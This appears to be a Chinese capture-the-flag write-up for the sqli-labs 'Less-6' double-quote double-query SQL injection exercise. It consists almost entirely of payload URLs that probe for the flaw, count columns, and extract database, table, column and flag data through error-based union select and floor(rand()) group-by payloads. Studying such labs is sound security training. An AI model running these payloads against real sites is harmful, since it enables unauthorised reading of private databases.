Less-6

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

1.判断是否存在注入

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1"

错误回显 => 存在注入

2.判断参数类型

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=2 --+

正确回显 => 字符注入

3.进行参数闭合

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" and 1=2 --+

错误回显

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1 and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 3 --+

正确回显

https://636-74a76d28-8823-452d-8999-abbd118f4d5c.do-not-trust.hacking.run/?id=1" order by 4--+

错误回显 => 有3列

5.进行双注入查询，查询所在数据库

https://636-22d36cf9-39bc-42ee-a65d-21cac444c7fb.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+

6.查询所在数据库的表

https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+

7.查看fThDtk9a表中的列

https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select column_name from information_schema.columns where table_schema=database() and table_name="fThDtk9a" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+

8.查看表中的flag列中的数据

https://636-a9abe15f-aa30-4ba0-b4df-13d306e167f0.do-not-trust.hacking.run/?id=1" union select null,count(*),concat((select flag from fThDtk9a limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+